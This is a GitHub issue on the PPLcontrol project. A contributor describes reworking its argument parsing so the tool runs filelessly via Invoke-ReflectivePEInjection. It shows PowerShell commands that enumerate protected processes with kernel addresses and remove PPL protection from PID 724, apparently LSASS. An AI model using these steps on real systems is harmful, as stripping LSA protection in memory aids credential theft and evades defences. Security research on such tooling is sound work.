PPLcontrol icon indicating copy to clipboard operation
PPLcontrol copied to clipboard
verified publisher icon itm4n

Update command line parsing in `PPLcontrol.cpp` to make it compatible with `Invoke-ReflectivePEInjection`

Open HopHouse opened this issue 2 years ago • 0 comments

I made modifications on how command line arguments are handled in order to make the tool compatible with Invoke-ReflectivePEInjection. Arguments were not used by the software program when argc and argv are in use.

I used shellapi functions CommandLineToArgvW() and GetCommandLineW() to parse arguments. This workaround is mentioned here : https://twitter.com/ShitSecure/status/1459134838431272960?s=20

Now it is working fine :

PS > Import-Module .\Invoke-ReflectivePEInjection.ps1
PS > $pe = [System.IO.File]::ReadAllBytes(".\PPLcontrol.exe")
PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "list" -DoNotZeroMZ

   PID  |  Level  |     Signer      |     EXE sig. level    |     DLL sig. level    |    Kernel addr.
 -------+---------+-----------------+-----------------------+-----------------------+--------------------
      4 | PP  (2) | WinSystem   (7) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387dc483040
    108 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387dc4e5080
    328 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd1b3080
    440 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd021180
    552 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddeb00c0
    560 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddfa0180
    676 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387de61e080
    724 | PPL (1) | Lsa         (4) | Windows        (0x0c) | Microsoft      (0x08) | 0xffff9387de630080
   1704 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387e2113080
   8332 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e3b46300
   7956 | PP  (2) | WinTcb      (6) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387e35f4080
   8656 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e38f1080

[+] Enumerated 12 protected processes.

PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "unprotect 724" -DoNotZeroMZ
[+] The process with PID 724 is no longer a PP(L).

HopHouse avatar Jun 09 '23 15:06 HopHouse